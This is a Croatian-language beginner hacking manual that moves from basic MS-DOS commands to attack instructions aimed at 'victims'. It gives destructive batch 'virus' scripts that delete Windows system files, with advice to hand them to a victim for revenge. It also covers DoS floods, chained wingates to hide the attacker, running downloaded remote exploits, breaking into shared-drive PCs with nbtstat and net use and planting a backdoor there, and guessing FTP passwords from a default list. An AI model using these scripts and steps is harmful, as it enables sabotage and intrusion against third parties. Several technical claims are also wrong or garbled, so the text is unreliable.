U ovom tutoru ćete naučiti osnovne MS-DOS komande i malo
objašnjenje.

Komande

* CD - Služi da se pozicionirate na određeni direktorij

Primjer: c:\> cd garnet

* COPY - Služi za kopiranje fajlova

Primjer: c:\> copy c:*.* a: -kopira cijeli sadržaj sa C: na disketu A:
Primjer: c:\> copy c:garnet.exe a: -kopira fajl garnet.exe na A:
Primjer: c:\> copy c:\windows\garnet.exe c:\dos -kopira fajl
garnet.exe u DOS direktorij
Primjer: c:\> copy a:*.* c: -kopira cijeli sadržaj sa diskete na C:

* DEL - Brisanje fajlova

Primjer: c:\> del *.* -briše sve fajlove na C:
Primjer: c:\> del garnet.exe -briše fajl garnet.exe
Primjer: c:\> del *.exe -brise sve datoteke EXE na C:

* DIR -Izlistava fajlove i direktorije

Primjer: c:\> dir -izlistava fajlove i direktoje na C:
Primjer: c:\> dir/p -izlistava postepeno fajlove i direktorije
Primjer: c:\> dir/w -izlistava fajlove i direktorije u drugom
formatu
 Primjer: c:\> dir/s -izlistava sve direktoje i fajlove na cijelome
hard disku

* MK (MKDIR) - Kreiranje direktorija

Primjer: c:\> mk garnet -kreira direktorij garnet

* RM (RMDIR)
Primjer: c:\> rm garnet -briše direktorij garnet

* COPY CON - Kreiranje fajla

Primjer: c:\> copy con garnet.txt -Kreira fajl garnet.exe
(kada unesete komandu i pritisnete ENTER, unesite text u taj fajl
i kad završite pritisnite tipku F6 i snimićete text koji ste unijeli u
taj fajl)

* REM - Komentar
Primjer: c:\> rem garnet i nhs-ac.cjb.net -ništa posebno

* PAUSE - Pauza
Primjer: c:\> pause -za daljni radi pritisnite ENTER

* DATE - Ispis datuma

Primjer: c:\> date

* TIME - Ispis vremena

Primjer: c:\> time

* TYPE - Ispis sadržaja fajla

Primjer: c:\> type garnet.txt -ispisuje sadržaj fajla garnet.txt

* ATTRIB - Zaštita fajlova

Primjer: c:\> attrib garnet.exe +h -sakriva fajl garnet.exe "Hiden"
Primjer: c:\> attrib garnet.exe +r -zaštićuje garnet.exe od
editiranja "Read only"
(Ako želite odključati fajl, onda umjesto "+", stavite "-")

* ECHO - Ispis teksta

Primjer: c:\> echo on -pokazuje tekst
Primjer: c:\> echo off -sakriva tekst

* /? - Help
(Za svaku ovu komandu možete upisati /? i dobit ćete pomoć za tu
komandu)
Primjer: c:\> attrib /?

Programi

MS-DOS sadrži mnogo programa a nekih od njih su glavni

hackerski alati. Ti programi su legalne vrste međutim hackeri ih
 koriste za razna ispitivanja i pronalaženja informacija o nekoj
žrtvi. Ovdje ću opisati par programa i otkriti njihove male tajne.

* Program NET

Ovo je svima poznat program u MS-DOS-u. Ove programe sve

možete naći u C:\Windows
Program NET ima mnogo funkcija. Preko njega možete ući u
direktorij na drugim računalima naravno ako je to dozvoljeno. Evo
objašnjenje za komande u NET:

NET CONFIG Displays your current workgroup settings.

NET DIAG Runs the Microsoft Network Diagnostics program to
display diagnostic information about your network.
NET HELP Provides information about commands and
error messages.
NET INIT Loads protocol and network-adapter drivers without
binding them to Protocol Manager.
NET LOGOFF Breaks the connection between your computer and
the shared resources to which it is connected.
NET LOGON Identifies you as a member of a workgroup.
NET PASSWORD Changes your logon password.
NET PRINT Displays information about print queues
and controls print jobs.
NET START Starts services.
NET STOP Stops services.
NET TIME Displays the time on or synchronizes your computer's
clock with the clock on a Microsoft Windows for
Workgroups, Windows NT, Windows 95, or NetWare time server.
NET USE Connects to or disconnects from a shared
resource or displays information about
connections.
NET VER Displays the type and version number of the
workgroup redirector you are using.
NET VIEW Displays a list of computers that share
resources or a list of shared resources
on a specific computer.

* Program NBTSTAT

Ovaj program također ima mnogo opcija. Pomoću njega možete

vidjeti da li je na nekom računalu otvoren port 139 NetBIOS. To
možete uraditi ovako:

c:\> nbtstat -A 195.222.45.22

Evo i help sa prevodom za NBTSTAT:

Nbtstat [-a remoteime] [-A ip adresa] [-c] [-n] [-R] [-r] [-S]
[-s]
Switchevi : -a Izlista imena remote kompjutera po tabeli zadanoj
za host ime.
-A Izlista imena remote kompjutera po tabeli zadanoj po IP
adresama
-c Izlista remote ime cache uključujući IP adresu.
-n Izlista lokalna NetBIOS imena
-r Izlista imena dobijna emitirane putem WWINS
-R Uzima i realod remote cache tabelu....<
-S Izlista sessione tabele sa destinacijom IP adresama
-s Izlista sessione tabele konverzije...

* Ping

Ovu komandu dobro znate.

Pomoću nje doznajete da li neka IP adresa postoji na internetu.
Npr: c:\> ping 195.222.45.22

* u MS-DOS-u programa ima zaista puno ali ja sam opisao samo 3,

barem su
ova osnovna. Za svaki ovaj program upišite /? ako želite dobiti
kratki help.
Npr: C:\> ping /?

Princip rada Hackera/Crackera

Već sam na početku objasnio kako se i hackeri i crackeri služe

istim principima i metodama prilikom upada u neki sistem (razlika
je samo u motivu). Ova metoda se više odnosi na crackere, ali ću
je navesti kao primjer klasične metode upada u sistem.

Kao i prije svakog složenijeg posla koji zahtjeva dosta pažnje i

koncentracije, treba naprije napraviti plan rada pa se tek onda
primiti posla. Tako je i u hackerskom svijetu. Postoji mnogo
načina, tehnika, alata i programa s pomoću kojih se može ući u
sistem, ali u većini slučajeva metoda upada je uglavnom ista. Upad
u sistem je podjeljen u tri koraka:
- skeniranje portova
- upotreba rootkit alata
- upad u sistem

SKENIRANJE PORTOVA: Svako računalo na mreži ima svoju IP

adresu i nekoliko portova preko kojih komunicira sa ostalim
računalima na mreži. Da bi napao neko računalo najprije trebaš
 saznati njegovu IP adresu. Postoji dosta raširenih tehnika
pomoću kojih možeš doći do žrtvine IP adrese. Jedan od tih
načina opisan je u drugom dijelu priručnika.
Sljedeći korak je skeniranje portova te IP adrese i dobijanje
informacija o servisima koji koriste pojedine portove. To se radi
port skenerima. Ponajbolji programi za skeniranje portova su
nmap i SuperScan. Razni servisi (naročito na server računalima)
otvaraju portove za komunikaciju i preko tih portova je moguće,
korištenjem exploita upasti na računalo. Naravno, portove brani
firewall (vatrozid) koji otežava upad na računalo. Skeniranje ima
za cilj da prikupi što više informacija koje će dovesti do
pronalaženja pravog rješenja za napad.
Pregledavanje i skeniranje portova tipičan je postupak u fazi
otkrivanja ranjivih mrežnih servisa, napadač skenira ciljnu mrežu
u svrhu otkrivanja potencijalnih meta napada.

Exploit je program koji koristi rupu u OS-u da bi korisniku pribavio

privilegije koje inače nema (tipa: root).
Root je glavni direktorij u datotečnom sustavu i on osigurava OS.
Obično root nalozi imaju sve privilegije na sistemu, i računaju se
kao najvrijednij 'plijen'.

ROOTKIT: Da bi spriječio druge da saznaju tvoju IP adresu i otkriju

tvoj identitet (ili čak da uzvrate napad) potrebno je da se sakriješ i
tako skriven da se krećeš po netu. Zato za skrivanje koristimo
rootkit. Rootkit se obično definira kao alat ili skupina alata koji
pomoću tehnika za skrivanje (eng. stealth) nastoje trajno očuvati
prisutnost napadača ili aktivnog koda u sustavu. Važno je za uočiti
da se rootkit ne koristi za zadobivanje pristupa računalu i
administratorskim ovlastima, već se njime samo zadržavaju ta
prava na način da se ta prisutnost u sustavu skriva od
administratora, programa za nadzor sustava i detekciju
zlonamjernog i neželjenog koda.

Da bi ispunio svoj cilj alat za prikrivanje napadača može skrivati:

procese, datoteke, mape, uređaje, podatke u registru sustava
(eng. registry keys), usluge (eng. services), mrežne portove, veze,
skrivene kanale (eng. covert channels), memorijske stranice,
mutacije podataka i izvršnog koda, virtualne strojeve itd.

UPAD U SISTEM je završni korak. Za njega također postoje razne

tehnike, alati i programi. Jedan od najčešćih upada je uz pomoć
SQL injection tj. specijalnog koda koji je pisan u SQL. Uz malo
sreće sa SQL injection napadač dobija pristup korisničkom panelu
admnistratora stranice, nad kojom tada ima sve ovlasti kao admin.
============================
=========

2. DIO

Uvod u Svijet Cracking-a

U prvom dijelu smo se detaljno upoznali sa vještinama i
principom rada hackera, a ovdje ćemo se pozabaviti crackingom.
Šta je cracking?
Cracking je jedna vrsta expresije. Često puta ste naišli na
Internetu na izraz: ovaj program ili sistem je crackiran (crack –
pucati), što u kompjuterskom smislu znači da je taj
program/sistem (zaštićen šifrom ili kodom) provaljen tj. da je
otkriven način kako da se u njega uđe. Ako hoćeš crackirati
možeš uvidjeti da nije lako razumijeti ispočetka neke osnovne
točke crackinga ali nakon što ih razumiješ imaćeš potrebno
znanje i iskustvo za daljnje usavršavanje crackinga.

Ovdje ću pojasniti i predstaviti neke načine crackinga (upada),

počevši od onih najjednostavnijih za scripty kiddyje do onih
kompliciranijih za prave crackere.

Pravljenje Virusa

Ovaj tutorial može Vam pomoći da pravite jednostavne viruse.

 Ovdje neću pričati o nekoj naprednoj tehnologiji jer je ovaj
tutorial za početnike, pa ako ste "elite cracker" ne gubite ovdje
vrijeme nego preskočite ovo poglavlje.
Ovaj tutorial govori o jednostavnom brisanju fajlova i direktorija,
pa ako ste se
nadali da ćete uništiti svijet, žao mi je ovaj tutorial nije za vas.

DOS batch virusi su virusi koji se završavaju sa ekstenzijom .bat.

Mogu sadržavati DOS komande. DOS nije nimalo sličan Windowsu
pa ga nije lako koristiti. Zato je Microsoft mali mini-jezik nazvan
"batch file". Batch fajlovi su fajlovi koji sadrže komande koje će
kompjuter slijediti. Ako kažemo da želimo izbrisati čitav hard
disk on će poslušati naredbu. Predstavit ću neke najkorisnije
komande:

@echo off - ova komanda će reći kompjuteru da ne pokazuje sve

što radi u datom trenutku. Dobro ako ne želite da user sazna šta
program radi.

echo text ovdje - ova komanda će izbaciti riječi text ovdje na na

žrtvin ekran.

cd\ - ova komanda bi rekla kompjuteru da se vrati na harddrive

(u većini slučajeva C:\). Većinu vremena ćete koristiti ovo.
Kasnije ćete vidjeti zašto.

cd direktorij - ovo otvara direktorij. Recimo da ste tipkali

komandu cd\ prije. Sada ste u c:\ zbog cd\ komande. Onda
recite kompjuteru cd windows i tada će kompjuter otvoriti
direktorij windows sa c: drajva. (c:/windows, najvažniji
direktorij osim ako nemate linux.)

RD direktorij - ova komanda će izbrisati direktorij. Ovo je teško

objasniti. Ako ste na c:/windows, i koristili ste komandu RD
windows
ovo neće raditi zato što direktorij windows nije u direktoriju
c:/windows/ . Jedini način da ovo radi jeste da budete u c:\ .
Zato što je direktorij windows u c:\ . Nadam se da se niste
izgubili ili zbunili. Ovo je teško objasniti potpunim početnicima,
jer ako koristite Windows već neko vrijeme ovako jednostavne
komande bi trebali shvatiti.

@del fajl - ova komanda briše određeni fajl u određenom

direktoriju pa ako ste npr u c:/windows/ bilo koji fajl možete
izbrisati kao npr. @del logo.sys

End - ova komanda završava i izlazi iz programa.

Sada kada znate osnovne komande možemo krenuti sa učenjem

kako da ih pretvorimo u viruse. Ljudi najbolje uče ako imaju
 primjer ispred sebe. Zato ću ja koristiti primjere.

Primjer br.1
---------------

@echo off
cd\
rd windows
echo Sredio sam te
echo Pozdrav
end
--------------

Hajdemo sad ovo analizirati:

@echo off - govori kompjuteru da ne izbacuje sve na ekran tako
žrtva ništa neće znati šta se dešava
cd\ govori da se pomakne u c:\ drajv.
rd windows - govori da deletuje (izbriše) direktorij windows iz
c:\ . To znači zbogom Windows.
Ostale komande Sredio sam te ... govore kompjuteru znate već
šta.
End -završava program.

Do sada ste vjerovatno shvatili kako ovi virusi rade.

Za svaki slučaj evo još jedan primjer.

Primjer br.2
--------------------
@echo off
cd\
cd windows
@del win.com
@del win.ini
echo Pokušaj sad popravit kompjuter
End
-------------------

Analiza virusa:
@echo off - govori kompjuteru da bude miran
cd\ - govori kompjuteru da ide na c:\
cd windows - govori kompjuteru da ide sa c:\ na c:\windows
@del win.com - govori kompjuteru da izbriše win.com iz
direktorija windows
@del win.ini - govori kompjuteru da izbriše win.ini iz direktorija
windows
echo Pokušaj sad popravit kompjuter ne treba pojašnjavati
End - kraj

Sada je vrijeme da saznate kako sačuvati fajl. To je lako.

U Notepadu ćete kliknuti na File -- Save As utipkajte ime fajla
 koje Vi sami želite ali da na kraju upišete .bat (npr.
mojprogram.bat mojvirus.bat itd)
Onda ga pošaljite na web ili ga dajte svojoj žrtvi. On što treba
uraditi jest da ga pokrene i on je gotov.

UPOZORENJE: Nemojte sa ovim jednostavnim virusima

uznemiravati neke veće i poznatije kompanije jer ćete imati
problema. Ako Vi pokrenete taj svoj virus onda ćete postati žrtva
vlastitog virusa.
Ovakve stvari, virusi bi trebali biti korišteni samo za osvetu.

DOS napadi i vrste DOS napada

U ovom slučaju riječ DoS ne znači onaj Microsoft MS-DOS, ova

skraćenica znači: "Denial of Service". Glavni cilj ovih napada je da
"uguše" konekciju i time obore određeni stroj. Kako to rade, ima
mnogo načina, ali glavni cilj je onemogućiti funkciju određenog
stroja, jednostavno onesposobiti ga.
Sve u svemu tehnika ovih napada je da se što više SYN paketa
pošalje na određeni stroj i time onesposobi. To se vrši na mnogo
načina koje ćete naučiti u slijedećim tekstovima. Problem je u
tome što se veoma teško može zaštititi od ovih vrsta napada jer se
jednostavno koriste normalne sistemske komande.
Evo nekih vrsta DoS napada i malo objašnjenje za svaku.

* Land
Ovdje se radi o takvom napadu koji šalje na otvoreni port SYN
paket koji moze srušiti sistem.

* Smurf-napadi
Ovdje se šalje što više pingova da bi se dobio što veći broj
odgovora i tako bi srušio sistem žrtve. Za 100 pingova dobija se
1000 odgovora.

* SYN flood
Syn Flood radi tako što napadač šalje žrtvi Syn Request da se
konektira na server žrtve, a žrtva odgovara sa ACK, i rezervira
buffer (mjesto u memoriji) za tu konekciju. Napadač ne odgovara
sa ACK nego šalje SYN Request ponovo, i žrtva ponovo odgovara
sa ACK i odvaja buffer i sve tako dok žrtva neostane bez Buffer
Space i krašira se. Ovom vrstom
napada nećete nanijeti skoro nikakvu štetu WebMasteru. On će
morati, poslije SYN Flood Attacka, da rebootuje računalo. Poslije
slanja zadnjeg SYN-ACK, serveru je potrebno 96 sekundi da
dealocira prostor koji je bio zauzet.

Jedna TCP konekcija između dva sistema ostvaruje se preko tkz.

"three-way handshake".
1) Sistem A---->Sistem B : SYN ("Hoću vezu s tobom")
2) Sistem B---->Sistem A : ACK/SYN ("Dobro uzeo sam to uobzir)
3) Sistem A---->Sistem B : ACK ("Dobro, ja se također slažem")

Sad se jednostavno u jednom SYN paketu daje pogrešna adresa

(jedna koja i ne postoji),
i time ne dolazi na sisitem B- paketa odgovor (ACK), jer i ne
postoji adresa.
Sistem B čeka još određeno vrijeme na odgovor, sve dok ne dođe
"connection timeout".
U tom vremenu se mora sistem B sa što više ping-ova prenapuniti.
Posljedica je da se
sisitem B prenapuni, tako da za određeno vrijeme više ni na jedan
SYN-paket odgovori.

* Ping of Death
Za ovaj napad služi obična komanda koja glasi: "ping adresa -n
9999999"
Kada se pošalje ova naredba na određeni server, onda on počinje
obrađivati, ali
pošto se poslalo oko milion pingova, onda server sporo obrađuje i
jednostavno se
sruši, dolazi do Buffer Overflow.
Međutim za ove napade je davno izašao patch i nevaži na jačim
serverima.
(Nemožete koristit ovaj napad sa slabijim računalima)

Hackiranje web stranice

_-ŠTA JE POTREBNO-_

Za ovaj tutorial nije potrebno imati Unix. Bilo bi mnogo bolje imati
Unix, ali znam da
većinu mrzi da ga instalira. Sve u svemu potrebno je par wingate
adresa i shell account. Bez brige, objasnit ću što je što.

Wingate je adresa na kojoj se nalazi programčić koji je veoma

sličan proxy-u. Postoji mnogo loše konfiguriranih wingate-a i to se
može iskoristiti kako bi se postigla neka anonimnost. Anonimnost
ćete postići tako što ćete se povezati preko telnet klijenta. Kasnije
o tome.
Shell account je kao račun na nekom kompjuteru koji služi da biste
mogli koristiti taj kompjuter sa njegovim uslugama, ali sa
određenim privilegijama.
Trebat će i jedan port scanner. To je program koji gleda otvorene
portove na nekom racunalu. Portovi su kao vrata preko kojih se
povežeš na neko racunalo i koristiš usluge. Ako je na primjer
otvoren port pod brojem 21, onda to znači da to računalo ima FTP
deamon, to je program koji pruža usluge FTP-a (File transfer
protocol). To je ono što vam treba.

_-KAKO OSTATI ANONIMAN-_

Ne može se ostati potpuno anoniman, ali se može ostati dosta

anoniman. Reći ću vam kako se može ostati anoniman preko
wingate-a. Postoji mnogo stranica na kojima se može naći lista
wingate-a, a jedna od takvih stranica je www.cyberarmy.com/lists
Tamo izaberete wingate, ima jako puno adresa i portova.
Uzmimo primjer da ima neka ovakva adresa: 213.43.22.11 (adresa
samo za primjer) koja je na portu 1080. Treba napraviti slijedeće:
Pokrenete telnet. To radite tako što idete na Start, pa Run i onda
upišete telnet. Pojaviće vam se jedan program koji baš i nije
prelijepog dizajna, ali to nije ni važno. Idete na Connect i onda
Remote System.
Poslije toga u Hostname utipkate adresu na kojoj smo rekli da je
Wingate, u ovom slučaju
213.43.22.11 . U polje port upišite 1080 (to sam rekao da Wingate
na toj adresi radi na tom portu). Termtype treba biti vt100.
Pritisnete connect, sačekate malo i povezaće se. Poslije toga se
telnetujete na svoj shell account tako što upišete nekaadresa.com
23
(23 je telnet port). Umjesto 23 možete upisati i recimo 21, tako
ćete se konektirati na FTP
protokol. Sad ste koliko toliko anonimni.
Savetujem da linkujete par wingate-a. To ćete uraditi tako što ćete
se umjesto da se telnetirate na shell-account, telnetirati na adresu
drugog wingate-a i tako redom dok vam ne ponestane wingate
adresa i onda se konektirate na shell account.

_-SHELL ACCOUNT-_

Unix je višekorisnički sistem. To znači da više korisnika može

koristiti isti operativni sistem. Postoje servisi koji besplatno daju
račune na svoj sistem. Jedan od ovih je npr. luxadmin.org . Kada
dobijete račun ovdje moći ćete koristiti Unix, međutim sa
ograničenjima. Imaćete račun sa smanjenim privilegijama i
 dobićete oko 50 MB u najboljem slucaju i biće dosta.
Znači idite na luxadmin.org i uzmite jedan shell account. Dobićete
svoj username i password. Sada se treba telnetirati na taj
shellaccount kako bi ga uopće mogli koristiti. Znači prvo telnet na
wingate i onda....već sam pisao o tome.
Kad se telnetirate dobićete prompt za login. Tu utipkate svoj
username i zatim password. Kada se ulogirate ušli ste u svoj shell
account.

_-NALAŽENJE INFORMACIJA O SITE-U-_

Ovo je najvažnija faza kod upadanja u neki site. Postoji više načina
i stvari koji se trebaju
otkriti. Treba otkriti Operativni sistem, otvorene portove, deamone
i verzije koji rade na serveru.

--Operativni sistem
Objasniću 2 načina. Prvi je da se telnetirate na server ako ima
otvoren telnet port 23. Tamo piše koji je Operativni Sistem.
Drugi način je netcraft.com Idite na taj site i kliknite na link na
kojem piše "Whats that site running" ili tako nešto. Idite na taj
link i upišite site koji vas zanima.
Tamo će pisati šta taj site ima. Postoji još načina, kao što je
nmap ...., ali ovo će biti dovoljno za početak.

Zatim skenirajte otvorene portove sa port scannerom.

Telnetirajte se na svaki port i pogledajte šta pise, koja je verzija
programa, ime ... SVE ZAPIŠITE.
Kad sve to završite imate dosta informacija o site-u da biste mogli
iskorisiti.

_-ISKORISTITI RUPU-_

Postoje stvari koje se zovu exploiti. To su programi koji iskoriste

rupu u programu. Sa ovim exploitima moguće je dobiti root na
nekom serveru (root je glavni datotečni direktorij koji ima sve
privilegije).
Postoji više vrsta exploita kao što su Remote (ovo ćemo mi
koristiti) ,Local i DoS.
Mi ćemo koristiti Remote. Exploiti su 95% pisani u C jeziku, a
ponekad i u PERL-u. Pošto već imamo informacije o site-u
ostaje nam da nađemo exploit i uđemo u server. Postoje stranice
gdje se oni mogu naći. Dvije najpoznatije i najbolje stranice su
http://packetstorm.securify.com i http://www.hack.co.za
Tamo nađite exploit za ono što ste zapisali. Važne su verzije
programa!
Sad kada ste skinuli exploit i stavili ga na shell account preostaje
samo kompajlirati exploit i pokrenuti ga. Ako je exploit napisan u
C-u onda treba uraditi ovo:

gcc file.c -o file

Sada imate kompajliran exploit. Možete ga pokrenuti sa: file ili
./file
Sada će da vam ispisa usage. Ako piše recimo: Usage <site>
<port> onda ćete ovako startati exploit: ./file www.nekisite.com
21
Malo sačekate i ušli ste. Sada samo koristite ono što sam pokazao
u sekciji o unix komandama.

Ako je napisan u PERL-u nema potrebe za kompajliranjem, jer je

PERL interpretiran jezik. Znači samo startujete sa: perl file.pl
Onda će vam opet ispisati Usage i opet ista priča.

Upad preko IP adrese

Kao prvo želim objasniti da se neću detaljno zadržavti na nekim

stvarima kako ovo ne bi isuviše bilo komplicirano za "novodošle
hackere", jer je ovo ipak priručnik za početnike.

Ukoliko niste znali Windows ima opciju koja se zove File and Print
Sharing. Ovu opciju možete koristiti ukoliko želite dijeliti drive i
štampač sa drugima, što znači da ćete dati pristup ostalim ljudima
(cijeloj mreži) fajlovima i štampaču. Kada uključite ovu opciju, vi
zapravo ostavljate jedan port otvoren (port 139) koji prihvaća
konekciju i razumije NETBIOS protokol.

U nekim malim firmama (sa LANom) ovo može biti i korisno. Na

primjer, umjesto da postoji nekoliko štampača za svaki kompjuter
posebno, koristi se samo jedan štampač koji se nalazi na
kompjuteru na kome je uključen File and Print Sharing. Ukoliko vi
koristite Fajl Sharing na vašem kućnom kompjuteru koji je spojen
na internet, svako na svijetu ko zna vašu IP adresu, može imati
pristup vašem računalu.

Ukoliko neznate da li je vama uključena File Sharing opcija samo

idite na Control Panel / Network. Sada bi trebali vidjeti prozor na
kome se nalazi spisak svog mrežnog software-a koji ste instalirali,
kao što je TCP/IP i dugme File and Print Sharing. Provjerite da li je
opcija čekirana. Ako jest (file sharing je uključen) onda je
unčekirajte tj isključite.
 Sada ću vam objasniti način na koji možete upasti na kompjuter
gdje je uključen File Sharing. Činjenica za to da Windows nije
siguran je to što se alati za hackiranje nalaze u samom Windowsu.
Programi koji su vam potrebni za ovo su Nbtstat.exe i Net.exe. Oba
programa se mogu naći u folderu C:\Windows, ali ukoliko ih tamo
ne nađete, onda ih potražite na instalacijskom CD-u Windowsa. Ovi
programi se pokreću iz MS-DOS Prompta. Da bi ste vidjeli pomoćni
meni (help) za Nbtstat.exe samo utipkajte nbtstat /? i za Net.exe
utipkajte net /?. Sada krenimo u akciju. Prvo vam je potrebna IP
adresa ili host kompjutera u koji upadate. Recimo da upadate u
komjuter čiji je host computer.isp.com i IP adresa 123.45.67.8.
Prvo što trebate uraditi je to da provjerite da li je FileSharing na
tom kompjuteru uključen. To izvedite tako sto ce te utipkati:

nbtstat -a IMEHOSTA
- ili
nbtstat -A IPADRESA

Bitno je da na drugom načinu utipkate veliko A. Malo je to čudno

zato što DOS nije CASE SENSITIVE, ali tako to radi. Sada možete
dobiti dvije vrste odgovora. Jedan koji će reći "Host Not Found" i
koji nam govori da na kompjuteru nije uključen FileSharing (ili da
ste pogriješili IP adresu) i drugi koji će vam dati spisak imena
(names) type i status koji znači da ste na pola puta od ulaska u
komp. Tabela bi trebala izgledati ovako:

Name Type Status

Host <20> UNIQUE Registered
Hostbug <00> GROUP Registered
Host machine <03> UNIQUE Registered

Kako ćete sada upasti? Lako! Prvo morate podesiti Lmhosts fajl
koji se nalazi u C:\Windows\Lmhosts (nema ekstenziju) uz pomoć
notepada, a ukoliko ga nema u Windows direktoriju, onda ga
napravite sami (samo ne zaboravite da se fajl zove 'Lmhosts' i da
nema ekstenziju). Da bi ste ga napravili samo otvorite Lmhosts fajl
u notepadu, unesite žrtvinu IP asresu, pritisnite TAB, i unesite
'Share Name' - ime koje ste našli uz pomoć nbtstat-a (u tabeli).
Sada snimite ovaj fajl i izađite iz notepada. Sada postoje tri načina
na koji možete pristupiti kompjuteru: najlaksi, laki i kul način!!!

[Najlakši način]
Imate IP adresu, imate Share name.. OK! Idite na START > RUN i samo
unesite slijedeće:
//IPADRESA/SHARENAME/
na primjer:
//123.45.67.8/hostbug/
Ovime će vam se pojaviti prozor sličan onome koji dobijete kada
kliknete na My Computer ikonu iz kojeg ćete moći pretraživati
žrtvin kompjuter.
 [Laki način]
Ukoliko se ne želite previše mučiti onda samo idite na START /
FIND / COMPUTERS i unesite IP adresu kompjutera u koji želite
upasti. Ukoliko ste dobro konfigurirali Lmhosts fajl, izaćiće vam
prozor sa fajlovima iz žrtvinog kompjutera. Praktično, biće kao da
radite na svom kompjuteru.

[Kul način]
Za kul način upada u komp uz pomoć file shareinga biće vam
potreban program Net.exe. Savjetujem vas da prvo pročitate
pomoć tako što ćete unijeti net /?. (u DOS prozoru). Također
možete koristiti i komandu: net opcija /? - gdje je opcija određena
opcija za koju vam treba pomoć.

Da biste pristupili kompjuteru na ovaj način morate prvo kreirati

virtualni drive. Ovo ćete uraditi ako utipkate:
net use drive \\[IPADRESA]\[SHARENAME]
Sada ćemo proučiti komandu:
- 'drive' je oznaka virtualnog drivea koji može biti f: g: z: x: itd...
- '[IPADRESA]' je IP adresa kompjutera u koji upadamo (npr.
123.45.67.8)
- '[SHARENAME]' je Share Name tj. ime koje ste našli uz pomoc nbtstat-
a (u tabeli).

Komanda izgleda nesto slično ovome:

net use x:\\123.45.67.8\hostbug

Nakon što izvršite ovo, samo utipkajte slovo drivea (u našem

primjeru x:) i pretražite drive uz pomoć MS-DOS komandi.

Možete dodatno uljepšati stvar:

Iskopirajte backdoor (zadnja vrata) na virtualni drive i pokrenite
ga kako bi uvijek imali pristup ovom kompjuteru. Ukoliko kopirate
i pokrećete backdoor uradite to na slijedeći način:
copy c:\backdoor.exe x:
x:
run=%SystemRoot%\backdoor.exe

Ovo će pokrenuti backdoor na žrtvinom kompjuteru i omogućiti

vam stalni pristup ovom kompjuteru.

Kao sto bi rekao Dennis Huges iz FBI-a:

"Jedini sigurni kompjuter na svijetu je onaj koji je isključen, zaključan u
sefu i zakopan 20 metara pod zemljom na tajnoj lokaciji... mada ni za
njega nisam previše siguran."
 Hackiranje FTP-a

FTP je skraćenica od engleskih riječi 'File Transfer Protocol' što bi

na našem jeziku značilo 'protokol prijenosa fajlova'. Kao što sam
naziv kaže FTP je protokol koji služi za prijenos fajlova od servera
do klijenta. Server je kompjuter na koji ste vi spojeni, a klijent ste
vi sami. Svaka stranica ima svoj određeni FTP server na koji se
uploaduje sadržaj stranice. Da bi se spojili na FTP server moramo
imati određeni FTP software poznat kao FTP klijent. Zapravo, sam
Windows dolazi sa FTP klijentom koji je pomalo težak ukoliko se
ne snalazite baš najbolje u MS DOS-u. Ovaj program možete naći u
slijedećem folderu:

C:\windows\ftp.exe

Program će se automatski sam pokrenuti i ako u MS DOS-u samo

utipkate FTP. Tada će vam se umjesto odzivnog znaka c:\>
pojaviti: ftp>

Ovo znači da je FTP klijent pokrenut. Prije nego što počnete sa FTP
Hacking-om morate prethodno znati i FTP komande. Spisak komandi
ćete dobiti ako utipkate help:
ftp> help
Također možete umesto help utipkati i samo znak ?
Kada ovo utipkate dobićete listu FTP komandi koja izgleda ovako:

Commands may be abbreviated. Commands are:

! delete literal prompt send

? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit
type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
ftp>

Sada ćemo svaku važniju naredbu obraditi zasebno. Pokusaću

objasniti čemu koja komanda služi i kako se koristi.

OPEN - ova naredba služi za spajanje na FTP server. Koristi se u

slijdećem obliku:
ftp> open ime_hosta.com
 DISCONNECT - kao što prethodna komanda služi za spajanje na
FTP server, tako ova služi za diskonektiranje sa servera. Za njeno
korištenje samo utipkate DISCONNECT i to je to.

GET - ukoliko želite preuzeti (download) neki fajl sa servera, onda

koristite ovu komandu:
ftp> get fajl.txt

MGET - kada želimo preuzeti više fajlova odjednom, onda ne

možemo koristiti naredbu GET već ćemo koristiti MGET:
ftp> mget *.txt

PUT - ova naredba se koristi za slanje (upload) fajlova na server:

ftp> put fajl.txt

MPUT - za slanje više fajlova na server koristi se naredba MPUT:

ftp> mput *.txt

Ovo su neke od osnovnih komandi koje su vam potrebne, a ukoliko

vam je potrebna pomoć za određenu komandu, onda ćete utipkati
slijedeće:
ftp> help {komanda}
gde je {komanda} određena komanda za koju vam treba pomoć.

Na primjer, ukoliko želim naučiti kako se koristi komanda CD

utipkati ću ovu komandu:

ftp> help CD

FTP program će prikazati slijedeće:

cd Change remote working directory

Sada kada znamo osnovne FTP komande možemo isprobati rad sa

FTP-om. Prije svega potrebno je da se spojimo na određeni FTP
server. Pokrenimo MS DOS i utipkamo FTP. Tada ćemo pokrenuti
FTP klijent. Za spajanje na server unesite slijedeće:

ftp> open ime_servera.com

gde je ime_servera.com bilo koji server na koji se želite da se
spojiti (npr. hotmail.com ili ptt.yu). Pogledajte slijedeći primjer da
bi vam bilo jasnije.

ftp> open web2.mtnl.net.in

Ovom komandom ću se spojiti na server web2.mtnl.net.in

Nakon što se spojimo na FTP server, dočekaće nas neka vrsta

banera za dobrodošlicu koji izgleda ovako:

Connected to web2.mtnl.net.in.
 220-
220-
#********************************************************
*****
220-# Welcome to MTNL's ftp site
220-
#********************************************************
*****
220-#
220-# You can upload your own homepages at this site!!!
220-#
220-# Just login with your username and upload the HTML pages.
220-# (You can use your favourite HTML editor as well)
220-#
220-# World will see it at http://web2.mtnl.net.in/~yourusername/
220-#
220-# So get going......UNLEASH YOUR CREATIVITY !!!!
220-#
220-
#********************************************************
*****
220-
220 ftp2.mtnl.net.in FTP server ready.
User (web2.mtnl.net.in:(none)): forbidden
331 Password required for forbidden.
Password:

Kao što i sami vidite za ulazak na FTP server potreban je

password. Sada vi sigurno mislite 'što će mi to kada ne znam
password?' Stvar je u tome što veliki broj FTP servera dozvoljava
takozvane anonimne ulaze (anonymous). To znači da ćete kao
password iskoristiti anonymous i moći ćete upasti u server i
izvršite upload ili download fajlova. Na našu žalost postoje i
serveri koji ne dozvoljavaju anonimne ulaze, već zahtjevaju
određeni password. Da bi upali u ovakav server ne postoji drugi
nacin osim da provalimo password. Predlažem da prethodno kao
password isprobate ime samog servera, a ukoliko to neće probajte
neki password sa slijedece kratke liste:

admin 12345
administrator abc
pass qwerty
password
open
enter

Ukoliko neće nijedan od ovih passworda onda vam preporučujem

jedan lamerski, ali efikasan način: da nabavite neki program za
crackiranje FTP passworda. Postoji jedan odličan program za te
